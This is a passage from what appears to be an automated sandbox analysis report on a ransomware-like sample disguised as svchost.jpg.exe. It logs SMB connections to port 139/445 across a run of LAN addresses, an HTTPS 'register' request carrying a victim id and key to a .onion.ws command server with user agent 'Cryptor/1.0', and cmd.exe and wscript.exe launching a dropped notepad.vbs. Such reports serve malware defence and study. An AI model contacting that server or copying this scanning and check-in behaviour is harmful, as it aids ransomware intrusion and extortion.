Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.110, remote_port = 445		1	Fn

TCP Session #221

Information	Value
Handle	0x700
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.111
Remote Port	445
Local Address	0.0.0.0
Local Port	49381
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.111, remote_port = 445		1	Fn

TCP Session #222

Information	Value
Handle	0x704
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.111
Remote Port	139
Local Address	0.0.0.0
Local Port	49382
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.111, remote_port = 139		1	Fn

TCP Session #223

Information	Value
Handle	0x708
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.112
Remote Port	139
Local Address	0.0.0.0
Local Port	49383
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.112, remote_port = 139		1	Fn

TCP Session #224

Information	Value
Handle	0x70c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.112
Remote Port	445
Local Address	0.0.0.0
Local Port	49384
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.112, remote_port = 445		1	Fn

TCP Session #225

Information	Value
Handle	0x710
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.113
Remote Port	445
Local Address	0.0.0.0
Local Port	49385
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.113, remote_port = 445		1	Fn

TCP Session #226

Information	Value
Handle	0x714
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.113
Remote Port	139
Local Address	0.0.0.0
Local Port	49386
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.113, remote_port = 139		1	Fn

TCP Session #227

Information	Value
Handle	0x718
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.114
Remote Port	139
Local Address	0.0.0.0
Local Port	49387
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.114, remote_port = 139		1	Fn

TCP Session #228

Information	Value
Handle	0x71c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.114
Remote Port	445
Local Address	0.0.0.0
Local Port	49388
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.114, remote_port = 445		1	Fn

TCP Session #229

Information	Value
Handle	0x720
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.115
Remote Port	445
Local Address	0.0.0.0
Local Port	49389
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.115, remote_port = 445		1	Fn

TCP Session #230

Information	Value
Handle	0x724
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.115
Remote Port	139
Local Address	0.0.0.0
Local Port	49390
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.115, remote_port = 139		1	Fn

TCP Session #231

Information	Value
Handle	0x728
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.116
Remote Port	139
Local Address	0.0.0.0
Local Port	49391
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.116, remote_port = 139		1	Fn

TCP Session #232

Information	Value
Handle	0x72c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.116
Remote Port	445
Local Address	0.0.0.0
Local Port	49392
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.116, remote_port = 445		1	Fn

TCP Session #233

Information	Value
Handle	0x730
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.117
Remote Port	445
Local Address	0.0.0.0
Local Port	49393
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.117, remote_port = 445		1	Fn

TCP Session #234

Information	Value
Handle	0x734
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.117
Remote Port	139
Local Address	0.0.0.0
Local Port	49394
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.117, remote_port = 139		1	Fn

TCP Session #235

Information	Value
Handle	0x738
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.118
Remote Port	139
Local Address	0.0.0.0
Local Port	49395
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.118, remote_port = 139		1	Fn

TCP Session #236

Information	Value
Handle	0x73c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.118
Remote Port	445
Local Address	0.0.0.0
Local Port	49396
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.118, remote_port = 445		1	Fn

TCP Session #237

Information	Value
Handle	0x740
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.119
Remote Port	445
Local Address	0.0.0.0
Local Port	49397
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.119, remote_port = 445		1	Fn

TCP Session #238

Information	Value
Handle	0x744
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.119
Remote Port	139
Local Address	0.0.0.0
Local Port	49398
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.119, remote_port = 139		1	Fn

TCP Session #239

Information	Value
Handle	0x748
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.120
Remote Port	139
Local Address	0.0.0.0
Local Port	49399
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.120, remote_port = 139		1	Fn

TCP Session #240

Information	Value
Handle	0x74c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.120
Remote Port	445
Local Address	0.0.0.0
Local Port	49400
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.120, remote_port = 445		1	Fn

TCP Session #241

Information	Value
Handle	0x750
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.121
Remote Port	445
Local Address	0.0.0.0
Local Port	49401
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.121, remote_port = 445		1	Fn

TCP Session #242

Information	Value
Handle	0x754
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.121
Remote Port	139
Local Address	0.0.0.0
Local Port	49402
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.121, remote_port = 139		1	Fn

TCP Session #243

Information	Value
Handle	0x758
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.122
Remote Port	139
Local Address	0.0.0.0
Local Port	49403
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.122, remote_port = 139		1	Fn

TCP Session #244

Information	Value
Handle	0x75c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.122
Remote Port	445
Local Address	0.0.0.0
Local Port	49404
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.122, remote_port = 445		1	Fn

TCP Session #245

Information	Value
Handle	0x760
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.123
Remote Port	445
Local Address	0.0.0.0
Local Port	49405
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.123, remote_port = 445		1	Fn

TCP Session #246

Information	Value
Handle	0x764
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.123
Remote Port	139
Local Address	0.0.0.0
Local Port	49406
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.123, remote_port = 139		1	Fn

HTTP Sessions (1)

Information	Value
Total Data Sent	496 bytes
Total Data Received	2 bytes
Contacted Host Count	1
Contacted Hosts	e3kok4ekzalzapsf.onion.ws

HTTP Session #1

Information	Value
User Agent	Cryptor/1.0
Server Name	e3kok4ekzalzapsf.onion.ws
Server Port	443
Data Sent	496
Data Received	2

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Cryptor/1.0, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Open Connection	protocol = HTTPS, server_name = e3kok4ekzalzapsf.onion.ws, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /index.php?action=register&id=VNE3fKaJ&key=Zo65wrmfQPseXjTQDUqO86lzoZAe034GQm2a4ickvRzVFvtlQenIQyku1HzjP76a5rJTxtY9nLVG0H2vyNQAOKPPIy6DOjJPi8NcnmG9fM4mDJctl4385d5Cknm28Avu7xSE833bPlTWnkPxn2JUNlU1wTHnxZSFs1WefR6R2IYffaZWf8tkcWh2WhBnVjfR497eI62ryrYH2qdR2JweR9hajQYKoAf63Nx7NTlEliC4O64hoofQkNDKW6OzwTeZ, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = e3kok4ekzalzapsf.onion.ws/index.php?action=register&id=VNE3fKaJ&key=Zo65wrmfQPseXjTQDUqO86lzoZAe034GQm2a4ickvRzVFvtlQenIQyku1HzjP76a5rJTxtY9nLVG0H2vyNQAOKPPIy6DOjJPi8NcnmG9fM4mDJctl4385d5Cknm28Avu7xSE833bPlTWnkPxn2JUNlU1wTHnxZSFs1WefR6R2IYffaZWf8tkcWh2WhBnVjfR497eI62ryrYH2qdR2JweR9hajQYKoAf63Nx7NTlEliC4O64hoofQkNDKW6OzwTeZ	1	Fn
Read Response	size = 2, size_out = 2	1	Fn Data

Process #2: cmd.exe

Information	Value
ID	#2
File Name	c:\windows\syswow64\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:19, Reason: Child Process
Unmonitor	End Time: 00:00:26, Reason: Self Terminated
Monitor Duration	00:00:07

OS Process Information

Information	Value
PID	0x96c
Parent PID	0x964 (c:\users\5p5nrgjn0js halpmcxz\desktop\svchost.jpg.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 970 0x 984 0x 988 0x 98C 0x 998

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	r	-
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
pagefile_0x0000000000110000	0x00110000	0x00111fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00120000	0x00120fff	Memory Mapped File	r	-
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000150000	0x00150000	0x00150fff	Pagefile Backed Memory	r	-
cversions.2.db	0x00160000	0x00163fff	Memory Mapped File	r	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
pagefile_0x00000000001b0000	0x001b0000	0x00337fff	Pagefile Backed Memory	r	-
private_0x0000000000340000	0x00340000	0x0043ffff	Private Memory	rw	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db	0x00440000	0x0045efff	Memory Mapped File	r	-
pagefile_0x0000000000460000	0x00460000	0x00460fff	Pagefile Backed Memory	rw	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db	0x00470000	0x0049ffff	Memory Mapped File	r	-
cversions.2.db	0x004a0000	0x004a3fff	Memory Mapped File	r	-
pagefile_0x00000000004b0000	0x004b0000	0x004b0fff	Pagefile Backed Memory	rw	-
private_0x00000000004e0000	0x004e0000	0x0051ffff	Private Memory	rw	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x00520000	0x00585fff	Memory Mapped File	r	-
private_0x00000000005b0000	0x005b0000	0x0062ffff	Private Memory	rw	-
private_0x0000000000650000	0x00650000	0x0074ffff	Private Memory	rw	-
private_0x00000000006d0000	0x006d0000	0x0070ffff	Private Memory	rw	-
private_0x00000000007a0000	0x007a0000	0x0089ffff	Private Memory	rw	-
pagefile_0x00000000008a0000	0x008a0000	0x00a20fff	Pagefile Backed Memory	r	-
private_0x0000000000a30000	0x00a30000	0x00a3ffff	Private Memory	rw	-
pagefile_0x0000000000a40000	0x00a40000	0x01e3ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001e40000	0x01e40000	0x02182fff	Pagefile Backed Memory	r	-
sortdefault.nls	0x02190000	0x0245efff	Memory Mapped File	r	-
pagefile_0x0000000002460000	0x02460000	0x0253efff	Pagefile Backed Memory	r	-
private_0x0000000002540000	0x02540000	0x0263ffff	Private Memory	rw	-
private_0x0000000002650000	0x02650000	0x0268ffff	Private Memory	rw	-
pagefile_0x0000000002690000	0x02690000	0x02a82fff	Pagefile Backed Memory	r	-
private_0x0000000002a90000	0x02a90000	0x02acffff	Private Memory	rw	-
private_0x0000000002bb0000	0x02bb0000	0x02caffff	Private Memory	rw	-
private_0x0000000002d00000	0x02d00000	0x02d3ffff	Private Memory	rw	-
private_0x0000000002ec0000	0x02ec0000	0x02fbffff	Private Memory	rw	-
private_0x0000000003070000	0x03070000	0x0316ffff	Private Memory	rw	-
cmd.exe	0x4a010000	0x4a05bfff	Memory Mapped File	rwx	-
uxtheme.dll	0x74d00000	0x74d7ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
profapi.dll	0x74e70000	0x74e7afff	Memory Mapped File	rwx	-
ntmarta.dll	0x74e80000	0x74ea0fff	Memory Mapped File	rwx	-
propsys.dll	0x74eb0000	0x74fa4fff	Memory Mapped File	rwx	-
comctl32.dll	0x74fb0000	0x7514dfff	Memory Mapped File	rwx	-
winbrand.dll	0x75150000	0x75156fff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
clbcatq.dll	0x754b0000	0x75532fff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
wldap32.dll	0x756a0000	0x756e4fff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
iertutil.dll	0x757f0000	0x759eafff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
wininet.dll	0x75be0000	0x75cd4fff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
devobj.dll	0x75e10000	0x75e21fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
oleaut32.dll	0x75f60000	0x75feefff	Memory Mapped File	rwx	-
setupapi.dll	0x75ff0000	0x7618cfff	Memory Mapped File	rwx	-
crypt32.dll	0x76190000	0x762acfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
urlmon.dll	0x762e0000	0x76415fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76640000	0x76666fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
msasn1.dll	0x772c0000	0x772cbfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Host Behavior

File (10)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	5	Fn
Open	STD_INPUT_HANDLE	-	3	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	os_pid = 0x0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn
Create	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	show_window = SW_SHOWNORMAL		1	Fn

Module (10)

Operation	Module	Additional Information	Count	Logfile
Load	SHELL32.dll	base_address = 0x76670000	1	Fn
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0x4a010000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75a20000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75a4a84f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75a53b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75a34a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x75a4a79d	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76691e46	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2019-01-04 10:33:27 (UTC)		1	Fn
Get Time	type = Ticks, time = 90106		1	Fn

Environment (18)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #3: wscript.exe

Information	Value
ID	#3
File Name	c:\windows\syswow64\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:22, Reason: Child Process
Unmonitor	End Time: 00:00:26, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

Information	Value
PID	0x990
Parent PID	0x96c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 994 0x 99C 0x 9A0 0x 9A8 0x 9B0 0x 9C0 0x 9C4 0x 9C8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	r	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00031fff	Pagefile Backed Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
locale.nls	0x00060000	0x000c6fff	Memory Mapped File	r	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rw	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
wscript.exe	0x000f0000	0x000fefff	Memory Mapped File	r	-
pagefile_0x0000000000100000	0x00100000	0x00100fff	Pagefile Backed Memory	r	-
